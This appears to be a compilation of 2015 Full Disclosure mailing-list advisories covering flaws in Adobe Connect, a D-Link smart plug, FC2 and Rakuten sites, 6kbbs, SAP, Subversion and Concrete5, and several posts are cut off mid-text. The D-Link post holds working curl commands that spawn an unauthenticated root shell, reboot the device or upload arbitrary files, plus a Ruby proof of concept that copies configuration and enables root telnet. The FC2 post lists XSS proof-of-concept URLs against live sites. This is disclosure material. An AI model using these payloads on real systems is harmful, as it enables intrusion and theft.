[FD] XSS vulnerability Adobe Connect 9.3 (CVE-2015-0343 )

[Stas Volfus]

Advisory:   Adobe Connect Reflected XSS
Author: Stas Volfus (Bugsec Information Security LTD)
Vendor URL: http://www.adobe.com/
Status: Vendor Notified


==
Vulnerability Description
==

Adobe Connect (Central) version: 9.3 is vulnerable to Reflected XSS
(Cross Site Scripting).

The attack allows execution of arbitrary JavaScript in the context of
the user’s browser.

CVE id: CVE-2015-0343  assigned  for this issue.



==
PoC
==
The following URL demonstrates the vulnerability:
https://vulnerablewebsite.com/admin/home/homepage/search?account-id=1&filter-rows=1&filter-start=0&now=yes&query=XSS Link



==
Disclosure Timeline
==

04-NOV-2014 - Vendor notified

01-DEC-2014 - CVE assigned

27-MAR-2015 - Resolved by vendor, fix deployed on Adobe Connect 9.4.


==
References
==http://www.adobe.com/il_en/products/adobeconnect.html
https://helpx.adobe.com/adobe-connect/release-note/connect-94-release-notes.html

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] D-Link DSP-W110 - multiple vulnerabilities

[Peter Adkins]

>> D-Link DSP-W110 - multiple vulnerabilities


Discovered by:

Peter Adkins 


Access:

Local network; unauthenticated access.


Tracking and identifiers:

CVE - None allocated.


Platforms / Firmware confirmed affected:

D-Link DSP-W110 (Rev A) - v1.05b01


Notes:

* There appears to be a number of references to both 'miiiCasa' as well as
'fitivision' throughout the firmware, which may indicate that these
vulnerabilities could be present in other devices not listed in this
document.

* A copy of this document, as well as the proof of concept below and a
more detailed write-up has been made available via GitHub:

 * https://github.com/darkarnium/secpub/tree/master/D-Link/DSP-W110


Arbitrary command execution / SQL Injection


Patches made to lighttpd by the vendor exposes the device to both SQL
injection, and more interestingly, arbitrary code execution. This is due to
the improper sanitization of data supplied by a client.

As the lighttpd service provides endpoints to be accessed without
authentication, it provides a vector for an attacker to execute arbitrary
commands on the device as the root user via HTTP call without authentication
credentials.

The root cause of this issue is that the contents of an HTTP Cookie, with
any name, is passed verbatim to a sprintf() call in order to form an SQL
query used to validate existing client sessions. By simply performing an
HTTP request against the device with a correctly formatted cookie set,
arbitrary SQL can be executed against the internal SQLite database.

Further to this issue, as this SQL query is passed to a popen() call in
order to execute the query, arbitrary commands are also able to be run on
the device as the root user.

This said, due to the length of the allocated buffer, the value of the
cookie cannot exceed 19 characters. However, as below, 19 characters is
exactly enough to pop a shell on the device.

  # Reboot the device.
  curl 192.168.1.3/ \
   --cookie "terribleness='\`reboot\`"

  # Spawn a root shell (telnet)
  curl 192.168.1.3/ \
   --cookie "terribleness=\`telnetd -l/bin/sh\`"


Arbitrary file upload


Patches made to lighttpd by the vendor exposes the device to arbitrary file
upload attacks.

Unfortunately, the only 'filtering' on this resources appears to be a
sprintf() call which statically prefixes a submitted 'dev' argument with
'/www'. However, if a HTTP request is performed without a 'dev' argument
at all, the sprintf() call is never reached, and a fully-qualified path can
be provided in the 'path' parameter - bypassing the upload path restriction.

As a result of the above, this resource can be used to upload files to
any location on the filesystem of devices running vulnerable firmware
versions without authentication.

  # Upload arbitrary files to the device.
  echo 'Some String' > test.txt
  curl \
   -X POST \
   -i \
   -F name=@test.txt \
   --http1.0 \
   '192.168.1.3/web_cgi.cgi?&request=UploadFile&path=/etc/'


Diagnostic Information


Patches made to lighttpd by the vendor of this device allows an attacker to
query the device, without authentication, for the following information:

 * Current WLAN SSIDs
 * Current WLAN channels
 * LAN and WAN MAC addressing
 * Current firmware version information
 * Hardware version information

Although not sensitive information, it may allow for identification of
devices running vulnerable firmware versions.

  # Information query.
  curl \
   192.168.1.3/mplist.txt


Ruby PoC


# DSP-W110-Lighttpd PoC.

require 'pp'
require 'optparse'
require 'restclient'

# Set defaults and parse command line arguments
options = {}

options[:addr] = "192.168.0.60"
options[:port] = 80

OptionParser.new do |option|

  option.on("--address [ADDRESS]", "Destination hostname or IP") do |a|
options[:addr] = a
  end

  option.on("--port [PORT]", "Destination TCP port") do |p|
options[:port] = p
  end

  option.parse!

end

# Define which actions we will be using.
actions = [
  {
:name => "Get device information",
:call => "txt_parser",
:path => "mplist.txt",
  },
  {
:name => "Snatch configuration",
:call => "noop",
:path => "HNAP1",
:cookies => { :cookie => "`cp /etc/co* /www/`" }
  },
  {
:name => "Fetch configuration",
:call => "conf_writer",
:path => "config.sqlite",
  },
  {
:name => "Enable telnet (root)",
:call => "noop",
:path => "HNAP1",
:cookies => { :cookie => "`telnetd -l/bin/sh`" }
  }
]

def noop(val)
  return
end

def txt_parser(txt)
  txt.split(/\r?\n/).each do |line|
puts "#{line}"
  end
end

def conf_writer(txt)
  begin
f = File.open('./config.sqlite', 'wb')
  rescue => e
puts "[!] Failed to open config.sqlite for writing #{e.message}"
  end
  f.write(txt)
  f.close
  puts "[*] Configuration fetched into 'config.sqlite'"
end

# Iterate over all actions and attempt to execute.
url = "http://#{options[:addr]}:#{options[:port]}";

puts "[!

[FD] FC2 & Rakuten Online Websites Multiple XSS (Cross-site Scripting) and Open Redirect Cyber Vulnerabilities

[Jing Wang]

*FC2 & Rakuten Online Websites Multiple XSS (Cross-site Scripting) and Open
Redirect Cyber Vulnerabilities *




FC2 and Rakuten are the first and second top ranking Japanese local online
websites. This post introduces several XSS (Cross-site Scripting) and Open
Redirect bugs of them.



The Alexa rank of fc2.com is 52 on February 18 2015 and the related rank in
Japan is 4. The Alexa rank of rakuten.co.jp is 64 on May 29 2015 and the
related rank is japan is 7.




Discover and Reporter:
Wang Jing, Division of Mathematical Sciences (MAS), School of Physical and
Mathematical Sciences (SPMS), Nanyang Technological University (NTU),
Singapore. (@justqdjing)
http://www.tetraph.com/wangjing






*(1) FC2 XSS (cross site scripting) & Open Redirect*



*Domain:*
blog.fc2.com/


"FC2 (founded July 20, 1999) is a popular Japanese blogging host, the third
most popular video hosting service in Japan (after YouTube and Niconico),
and a web hosting company headquartered in Las Vegas, Nevada. It is the
sixth most popular website in Japan overall (as of January 2014). FC2 is an
abbreviation of "Fantastic Kupi-Kupi (クピクピ)". It is known to allow
controversial adult content such as pornography and hate speech (unlike
many of its competitors). The company uses rented office space for its
headquarters which it shares with many other U.S.-based businesses. It also
pays taxes in the United States. The physical servers are located in the
United States. However, it is believed that the majority of the company and
its users (including employees) are located within Japan" (Wikipedia)


The Alexa rank of fc2.com is 52 on February 18 2015. It is the top one
Japanese local website service.





*(1.1) FC2 fc2.com  Online Website URLs XSS (cross site
scripting) Vulnerabilities (All URLs Under Domain blog.fc2.com/tag
)*




*Vulnerability description:*

FC2 has a computer cyber security bug problem. It is vulnerable to XSS
attacks. Here is the description of XSS: "Hackers are constantly
experimenting with a wide repertoire of hacking techniques to compromise
websites and web applications and make off with a treasure trove of
sensitive data including credit card numbers, social security numbers and
even medical records. Cross-site Scripting (also known as XSS or CSS) is
generally believed to be one of the most common application layer hacking
techniques Cross-site Scripting allows an attacker to embed malicious
JavaScript, VBScript, ActiveX, HTML, or Flash into a vulnerable dynamic
page to fool the user, executing the script on his machine in order to
gather data. The use of XSS might compromise private information,
manipulate or steal cookies, create requests that can be mistaken for those
of a valid user, or execute malicious code on the end-user systems. The
data is usually formatted as a hyperlink containing malicious content and
which is distributed over any possible means on the internet." (Acunetix)




The programming code flaw occurs at fc2 URLs' filenames . Fc2 only filter
part of the filenames in the urls. Almost all urls are affected under
domain blog.fc2.com/tag are affected. i.e.
http://blog.fc2.com/tag/drug/
http://blog.fc2.com/tag//アメリカ/
http://blog.fc2.com/tag/tag/翻訳
http://blog.fc2.com/tag//>レシピブログに参加中♪



The vulnerability can be attacked without user login. Tests were performed
on Firefox (37.02) in Ubuntu (14.04) and IE (9.0.15) in Windows 7.


POC Code:
http://blog.fc2.com/tag/drug//";>
http://blog.fc2.com/tag//アメリカ//";>
http://blog.fc2.com/tag/tag/翻訳//";>
http://blog.fc2.com/tag//>レシピブログに参加中//">







*Poc Video:*
https://www.youtube.com/watch?v=jQ8dLbno6JQ


*Blog Detail:*
http://tetraph.com/security/xss-vulnerability/fc2-blog-xss/
http://securityrelated.blogspot.com/2015/06/fc2-fc2com-online-website-urls-xss.html







*(1.2) FC2 Online Web Service Open Redirect (Unvalidated Redirects and
Forwards) Cyber Security Vulnerabilities*



*(1.2.1) Vulnerability Description:*

FC2 online web service has a computer cyber security bug problem. It can be
exploited by Open Redirect (Unvalidated Redirects and Forwards) attacks.
Here is the description of Open Redirect: "An open redirect is an
application that takes a parameter and redirects a user to the parameter
value without any validation. This vulnerability is used in phishing
attacks to get users to visit malicious sites without realizing it."  One
consequences of it is Phishing. (OWASP)


The program code flaw can be attacked without user login. Tests were
performed on Microsoft IE (9 9.0.8112.16421) of Windows 7, Mozilla Firefox
(37.0.2) & Google Chromium 42.0.2311 (64-bit) of Ubuntu (14.04.2)，Apple
Safari 6.1.6 of Mac OS X v10.9 Mavericks.


In fact, during the test, it is not hard to find URL Redirection bugs in
FC2. Maybe fc2.com pays little attention to mitigate these Vulnerabilities.
These bugs were found by using URFDS.





*(1.2.2)* Use one of webpages for the following tests. The webpage address
is "http://security

[FD] 6kbbs v8.0 Weak Encryption Cryptography Security Vulnerabilities

[Jing Wang]

*6kbbs v8.0 Weak Encryption Cryptography Security Vulnerabilities*


Exploit Title: 6kbbs Weak Encryption Web Security Vulnerabilities
Vendor: 6kbbs
Product: 6kbbs
Vulnerable Versions: v7.1   v8.0
Tested Version: v7.1   v8.0
Advisory Publication: June 08, 2015
Latest Update: June 10, 2015
Vulnerability Type: Inadequate Encryption Strength [CWE-326]
CVE Reference: *
CVSS Severity (version 2.0):
Discover and Reporter: Wang Jing [School of Physical and Mathematical
Sciences (SPMS), Nanyang Technological University (NTU), Singapore]
(@justqdjing)






*Recommendation Details:*


*(1) Vendor & Product Description:*


Vendor:
6kbbs



*Product & Vulnerable Versions:*
6kbbs
v7.1
v8.0



*Vendor URL & download:*
6kbbs can be gain from here,
http://www.6kbbs.com/download.html




*Product Introduction Overview:*
"6kbbs V8.0 is a PHP + MySQL built using high-performance forum, has the
code simple, easy to use, powerful, fast and so on. It is an excellent
community forum program. The program is simple but not simple; fast, small;
Interface generous and good scalability; functional and practical pursuing
superior performance, good interface, the user's preferred utility
functions. Forum Technical realization (a) interface : using XHTML + CSS
structure, so the structure of the page , easy to modify the interface ;
save the transmission static page code , greatly reducing the amount of
data transmitted over the network ; improve the interface scalability ,
more in line with WEB standards, support Internet Explorer, FireFox, Opera
and other major browsers. (b) Program : The ASP + ACCESS mature technology
, the installation process is extremely simple , the environment is also
very common."


"(1) PHP version : (a) 6kbbs V8.0 start using PHP + MySQL architecture. (b)
Currently ( July 2010 ) is still in the testing phase , 6kbbs V8.0 is the
latest official release. (2) ASP Version: 6kbbs (6k Forum) is an excellent
community forum process . The program is simple but not simple ; fast ,
small ; interface generous and good scalability ; functional and practical
. pursue superiority , good interface , practical functions of choice for
subscribers."





*(2) Vulnerability Details:*
6kbbs web application has a computer security problem. It can be exploited
by weak encryption attacks. The software stores or transmits sensitive data
using an encryption scheme that is theoretically sound, but is not strong
enough for the level of protection required. A weak encryption scheme can
be subjected to brute force attacks that have a reasonable chance of
succeeding using current attack methods and resources.


Several 6kbbs products 0-day web cyber bugs have been found by some other
bug hunter researchers before. 6kbbs has patched some of them. "The Full
Disclosure mailing list is a public forum for detailed discussion of
vulnerabilities and exploitation techniques, as well as tools, papers,
news, and events of interest to the community. FD differs from other
security lists in its open nature and support for researchers' right to
decide how to disclose their own discovered bugs. The full disclosure
movement has been credited with forcing vendors to better secure their
products and to publicly acknowledge and fix flaws rather than hide them.
Vendor legal intimidation and censorship attempts are not tolerated here!"
A great many of the web securities have been published here.




Source Code:
row_select_one("users","username='{$username}'");
if(!empty($extrow) && !empty($extrow['salt'])){

if(md5(md5($userpass).$extrow['salt'])==$extrow['userpass']){
$row=$extrow;
$new_row["userpass"]=$userpass_encrypt;
$new_row["salt"]="";

$db->row_update("users",$new_row,"id={$extrow['id']}");
}
}
}
?>



Source Code From:
http://code.google.com/p/6kbbs/source/browse/trunk/convert/discuz72/loginext.php?r=16


We can see that "userpass" stored in cookie was encrypted using "$userpass"
user password directly. And there is no "HttpOnly" attribute at all. Since
md5 is used for the encryption, it is easy for hackers to break the
encrypted message.


"The MD5 message-digest cryptography algorithm is a widely used
cryptographic hash function producing a 128-bit (16-byte) hash value,
typically expressed in text format as a 32 digit hexadecimal number. Papers
about it have been published on Eurocrypt, Asiacrypt and Crypto. Meanwhile,
researchers focusing on it spread in Computer Science, Computer
Engineering, IEEE and Mathematics. MD5 has been utilized in a wide variety
of cryptographic applications, and is also commonly used to verify data
integrity. MD5 was designed by Ronald Rivest in 1991 to replace an earlier
hash function, MD4. The source code in RFC 1321 contains a "by attribution"
RSA license." (Wikipedia)








*References:*
http://tetraph.com/security/weak-encryption/6kbbs-v8-0-weak-encryption/
http://securityrelated.blogspot.com/2015/06/6kbbs-v80-

[FD] SAP Security Notes June 2015

[Darya Maenkova]

SAP has released the monthly critical patch update 
for June 2015. This patch update closes a lot of vulnerabilities in SAP 
products. The most popular vulnerability is Missing Authorization Check. 
This month, three critical vulnerabilities found by ERPScan researchers 
Vahagn Vardanyan, Rustem Gazizov, and Diana Grigorieva were closed.


*Issues that were patched with the help of ERPScan*

Below are the details of SAP vulnerabilities that were found byERPScan 
researchers.


 * An XML eXternal Entity vulnerability in SAP Mobile Platform
   on-premise (CVSS Base Score:5.5).Updateis available in SAP Security
   Note2159601 . An
   attacker can use XML eXternal Entities to send specially crafted
   unauthorized XML requests, which will be processed by the XML
   parser. The attacker will get unauthorized access to the OS file system.
 * A Hardcoded Credentials vulnerability in SAP Cross-System Tools
   (CVSS Base Score:3.6).Updateis available in SAP Security Note2059659
   . An attacker can
   use hardcoded credentials for unauthorized access and perform
   various actions in the system. In addition, it is likely that the
   code will be implemented as a backdoor into the system.
 * A Hardcoded Credentials vulnerability in SAP Data Transfer Workbench
   (CVSS Base Score:2.1).Updateis available in SAP Security Note2057982
   . An attacker can
   use the hardcoded credentials for unauthorized access and perform
   various actions in the system. In addition, it is likely that the
   code will be implemented as a backdoor into the system.


*The most critical issues found by other researchers*

Some of our readers and clients asked us to categorize the most critical 
SAP vulnerabilities to patch them first. Companies providing SAP 
Security Audit, SAP Security Assessment, or SAP Penetration Testing 
services can include these vulnerabilities in their checklists. The most 
critical vulnerabilities of this update can be patched by the following 
SAP Security Notes:


 * 2151237 : SAP GUI
   for Windows has a Buffer Overflow vulnerability (CVSS Base
   Score:9.3). An attacker can use Buffer Overflow for injecting
   specially crafted code into working memory, which will be executed
   by the vulnerable application under the privileges of that
   application. This can lead to the attacker taking complete control
   over the application, denial of service, command execution, and
   other attacks. In case of command execution,attackercan obtain
   critical technical and business-related information stored in the
   vulnerable SAP-system or escalate their own privileges. As for
   denial of service, the process of the vulnerable component may be
   terminated. For this time, nobody will be able to use this service,
   which negatively influences business processes, system downtime,
   and, consequently, business reputation. It is recommended to install
   this SAP Security Note to prevent risks.
 * 2129609 : SAP EP
   JDBC Connector has an SQL Injection vulnerability (CVSS Base
   Score:6.5). An attacker can use SQL Injections with the help of
   specially crafted SQL queries. They can read and modify sensitive
   information from a database, execute administrative operations in a
   database, destroy data or make it unavailable. In some cases, an
   attacker can access system data or execute OS commands. It is
   recommended to install this SAP Security Note to prevent risks.
 * 1997734 : SAP RFC
   runtime has a Missing AuthorizationXheckvulnerability (CVSS Base
   Score:6.0). An attacker can use Missing Authorization Checks to
   access a service without any authorization procedures and use
   service functionality that has restricted access. This can lead to
   information disclosure, privilege escalation, and other attacks. It
   is recommended to install this SAP Security Note to prevent risks.
 * 2163306 : SAP
   CommonCryptoLib and SAPCRYPTOLIB are vulnerable to FREAK
   (CVE-2015-0204, CVSS Base Score:5.0). It allows an attacker to
   intercept HTTPS connections between vulnerable clients and servers
   and force them to use weakened encryption, which the attacker can
   break to steal or manipulate sensitive data. All the attacks on this
   page assume a network adversary (i.e. a man-in-the-middle) to tamper
   with TLS handshake messages. The typical scenario to mount such
   attacks is by tampering with the Domain Name System (DNS), for
   example via DNS rebinding or domain name seizure. This attack
   targets a class of deliberately weak export cipher suites. It is
   recommended to install this SAP Security 

[FD] Apache vulnerability program faulting module ntdll.dll

[Bruno Luiz]

Subversion HTTP servers allow spoofing svn:author property values
  for new revisions.

Summary:


  Subversion's mod_dav_svn server allows setting arbitrary svn:author
  property values when committing new revisions.  This can be accomplished
  using a specially crafted sequence of requests.  An evil-doer can fake
  svn:author values on his commits.  However, as authorization rules are
  applied to the evil-doer's true username, forged svn:author values can
  only happen on commits that touch the paths the evil-doer has write
  access to.

  Doing so does not grant any additional access and does not circumvent the
  standard Apache authentication or authorization mechanisms.  Still, an
  ability to spoof svn:author property values can impact data integrity in
  environments that rely on these values.

  There are no known instances of the problem being exploited in the wild,
  but an exploit has been tested.

Known vulnerable:
=

  Subversion HTTPD servers 1.5.0 through 1.7.19 (inclusive)
  Subversion HTTPD servers 1.8.0 through 1.8.11 (inclusive)

Known fixed:


  Subversion 1.7.20
  Subversion 1.8.13
  svnserve (any version) is not vulnerable

  Subversion 1.8.12 was not publicly released.

Details:


  The Subversion http://-based protocol used for communicating with
  a Subversion mod_dav_svn server has two versions, v1 and v2.  The v2
  protocol was added in Subversion 1.7.0, but the server allows using both
  protocol versions for compatibility reasons.  When a commit happens, the
  client sends a sequence of requests (POST, PUT, MERGE, etc.) that depend
  on the negotiated protocol version.

  Usually, a server uses the name of the authenticated user as the svn:author
  value for a new revision.  However, with a specially handcrafted v1 request
  sequence, a client can instruct the server to use the svn:author property
  that she/he provided.  In this case, the server will use an arbitrary value
  coming from the client instead of the svn:author value originating from
  the authentication mechanism.

Severity:
=

  CVSSv2 Base Score: 3.5
  CVSSv2 Base Vector: AV:N/AC:M/Au:S/C:N/I:P/A:N

  We consider this to be a medium risk vulnerability.

  An attacker needs to have commit access to the repository to exploit the
  vulnerability.  The ability to spoof svn:author property values can impact
  data integrity in environments that expect the values to denote the actual
  commit author.  The real ID of the author could still be determined using
  server access logs.  However, it is also possible that a spoofed change
  could go in unnoticed.

  Subversion's repository hooks might see the real ID of the author or the
  forged value, depending on the hook type and the hook contents:

  - A start-commit hook will see the real username in the USER argument
  - A start-commit hook will see the real username when performing
'svnlook propget --revprop -t TXN_NAME'
  - A pre-commit hook will see the forged username when performing
'svnlook propget --revprop -t TXN_NAME'
  - A post-commit hook will see the forged username when performing
'svnlook propget --revprop -r REV'

  Unfortunately, no special configuration is required and all mod_dav_svn
  servers are vulnerable.

Recommendations:


  We recommend all users to upgrade to Subversion 1.8.13.  Users of
  Subversion 1.7.x or 1.8.x who are unable to upgrade may apply the
  included patch.

  New Subversion packages can be found at:
  http://subversion.apache.org/packages.html

  No workaround is available.

References:
===

  CVE-2015-0251  (Subversion)

Reported by:


  Bruno Luiz, d4t

Patches:


  Patch against 1.7.19:
[[[
Index: subversion/mod_dav_svn/deadprops.c
===
--- subversion/mod_dav_svn/deadprops.c(revision 1660122)
+++ subversion/mod_dav_svn/deadprops.c(working copy)
@@ -160,6 +160,23 @@ get_value(dav_db *db, const dav_prop_name *name, s
}


+static svn_error_t *
+change_txn_prop(svn_fs_txn_t *txn,
+const char *propname,
+const svn_string_t *value,
+apr_pool_t *scratch_pool)
+{
+  if (strcmp(propname, SVN_PROP_REVISION_AUTHOR) == 0)
+return svn_error_create(SVN_ERR_RA_DAV_REQUEST_FAILED, NULL,
+"Attempted to modify 'svn:author' property "
+"on a transaction");
+
+  SVN_ERR(svn_repos_fs_change_txn_prop(txn, propname, value, scratch_pool));
+
+  return SVN_NO_ERROR;
+}
+
+
static dav_error *
save_value(dav_db *db, const dav_prop_name *name,
const svn_string_t *const *old_value_p,
@@ -210,9 +227,8 @@ save_value(dav_db *db, const dav_prop_name *name,
 {
   if (db->resource->working)
 {
-  serr = svn_repos_fs_change_txn_prop(resource->info->root.txn,
-  propname, value,
-

[FD] [KIS-2015-03] Concrete5 <= 5.7.4 (Access.php) SQL Injection Vulnerability

[Egidio Romano]

---
Concrete5 <= 5.7.4 (Access.php) SQL Injection Vulnerability
---


[-] Software Link:

https://www.concrete5.org/


[-] Affected Versions:

Version 5.7.3.1, 5.7.4, and probably other versions.


[-] Vulnerability Description:

The vulnerable code is located in /concrete/src/Permission/Access/Access.php:

168.protected function buildAssignmentFilterString($accessType, 
$filterEntities)
169.{
170.$peIDs = '';
171.$filters = array();
172.if (count($filterEntities) > 0) {
173.foreach ($filterEntities as $ent) {
174.$filters[] = $ent->getAccessEntityID();
175.}
176.$peIDs .= 'and peID in (' . implode($filters, ',') . ')';
177.}
178.if ($accessType == 0) {
179.$accessType = '';
180.} else {
181.$accessType = ' and accessType = ' . $accessType;
182.}

The Access::buildAssignmentFilterString() method uses its $accessType parameter 
to construct a SQL query
without a proper validation at line 181. This can be exploited to inject and 
execute arbitrary SQL commands.
Successful exploitation of this vulnerability requires an account with 
privileges to edit page permissions.


[-] Solution:

Update to version 5.7.4.1 or later.


[-] Disclosure Timeline:

[05/05/2015] - Vulnerability details sent through HackerOne
[12/05/2015] - Vendor said a patch has been committed and will be available in 
the next version
[12/05/2015] - Version 5.7.4.1 released along with the patch for this 
vulnerability
[11/06/2015] - Vulnerability publicly disclosed on HackerOne
[11/06/2014] - CVE number requested
[11/06/2014] - Publication of this advisory


[-] CVE Reference:

The Common Vulnerabilities and Exposures project (cve.mitre.org) has not 
assigned a name to this vulnerability yet.


[-] Credits:

Vulnerability discovered by Egidio Romano of Minded Security.


[-] Original Advisory:

http://karmainsecurity.com/KIS-2015-03


[-] Other References:

https://hackerone.com/reports/59664

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] [KIS-2015-02] Concrete5 <= 5.7.3.1 Multiple Reflected Cross-Site Scripting Vulnerabilities

[Egidio Romano]

Concrete5 <= 5.7.3.1 Multiple Reflected Cross-Site Scripting Vulnerabilities



[-] Software Link:

https://www.concrete5.org/


[-] Affected Versions:

Version 5.7.3.1 and probably other versions.


[-] Vulnerabilities Description:

1) The vulnerable code is located in 
/concrete/views/panels/details/page/versions.php:

5.  tabs($tabs);
10. foreach($_REQUEST['cvID'] as $cvID) { ?>
11. 
12. 

User input passed through the "cvID" and "cID" request parameters is not 
properly sanitized before being used to
generate HTML output at lines 6 and 13. This can be exploited to conduct 
reflected Cross-Site Scripting (XSS) attacks.

2) The vulnerable code is located in 
/concrete/src/Form/Service/Widget/UserSelector.php:

17.  public function selectUser($fieldName, $uID = false, $javascriptFunc = 
'ccm_triggerSelectUser') {
18. $selectedUID = 0;
19. if (isset($_REQUEST[$fieldName])) {
20. $selectedUID = $_REQUEST[$fieldName];
21. } else if ($uID > 0) {
22. $selectedUID = $uID;
23. }
24. 
25. $html = '';
26. $html .= ' ...
27. if ($selectedUID > 0) {
28. $ui = UserInfo::getByID($selectedUID);
29. $html .= $ui->getUserName();
30. }
31. $html .= '';
32. $identifier = new \Concrete\Core\Utility\Service\Identifier();
33. $selector = $identifier->getString(32);
34. $html .= '';
36. $html .= '';

User input passed through the "uID" request parameter is not properly sanitized 
before being used to generate
HTML output at line 35. This can be exploited to conduct reflected Cross-Site 
Scripting (XSS) attacks.

3) The vulnerable code is located in /concrete/elements/group/search.php:

4.  $searchRequest = $_REQUEST;
5.  $result = 
Loader::helper('json')->encode($controller->getSearchResultObject()->getJSONObject());
6.  $tree = GroupTree::get();
7.  $guestGroupNode = GroupTreeNode::getTreeNodeByGroupID(GUEST_GROUP_ID);
8.  $registeredGroupNode = 
GroupTreeNode::getTreeNodeByGroupID(REGISTERED_GROUP_ID);
9.  ?>
10. 
11. 
12. div[data-search=groups] form.ccm-search-fields {
13. margin-left: 0px !important;
14. }
15. 
16. 
17. 
18. 

[FD] [KIS-2015-01] Concrete5 <= 5.7.3.1 (sendmail) Remote Code Execution Vulnerability

[Egidio Romano]

---
Concrete5 <= 5.7.3.1 (sendmail) Remote Code Execution Vulnerability
---


[-] Software Link:

https://www.concrete5.org/


[-] Affected Versions:

Version 5.7.3.1 and probably other versions.


[-] Vulnerability Description:

The vulnerable code is located in 
/concrete/controllers/single_page/dashboard/system/registration/open.php:

21.  switch ($this->post('registration_type')) {
22. case "enabled":
23. Config::save('concrete.user.registration.enabled', true);
24. Config::save('concrete.user.registration.validate_email', 
false);
25. Config::save('concrete.user.registration.approval', false);
26. Config::save('concrete.user.registration.notification', 
$this->post('register_notification'));
27. Config::save(
28. 'concrete.user.registration.notification_email',
29. Loader::helper('security')->sanitizeString(
30. $this->post('register_notification_email')));
31. break;

User input passed through the "register_notification_email" POST parameter is 
not properly sanitized before
being stored into a configuration setting at lines 27-30 (the sanitizeString() 
method doesn’t check if it is
a valid email address). This value is used as a sender email address to send 
out a notification email when a
new user is being registered, and this is done using the PHP mail() function, 
specifically passing such value
to its fifth parameter. So, when sendmail is used to send out such an email, it 
is possible to alter the
command line and tell the sendmail program to log all the email traffic in an 
arbitrary file chosen by the
attacker, resulting in an arbitrary PHP code execution. This vulnerability is 
mitigated by the fact that it
can be exploited only by authenticated administrator users (even though it 
could be exploited via a Cross-Site
Request Forgery attack as well) and only if the email is being sent with 
sendmail.


[-] Solution:

Update to version 5.7.4 or later.


[-] Disclosure Timeline:

[05/05/2015] - Vulnerability details sent through HackerOne
[05/05/2015] - Vendor said a patch has been committed and will be available in 
the next version
[07/05/2015] - Version 5.7.4 released along with the patch for this 
vulnerability
[06/06/2015] - Vulnerability publicly disclosed on HackerOne
[11/06/2014] - CVE number requested
[11/06/2014] - Publication of this advisory


[-] CVE Reference:

The Common Vulnerabilities and Exposures project (cve.mitre.org) has not 
assigned a name to this vulnerability yet.


[-] Credits:

Vulnerability discovered by Egidio Romano of Minded Security.


[-] Original Advisory:

http://karmainsecurity.com/KIS-2015-01


[-] Other References:

https://hackerone.com/reports/59663

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/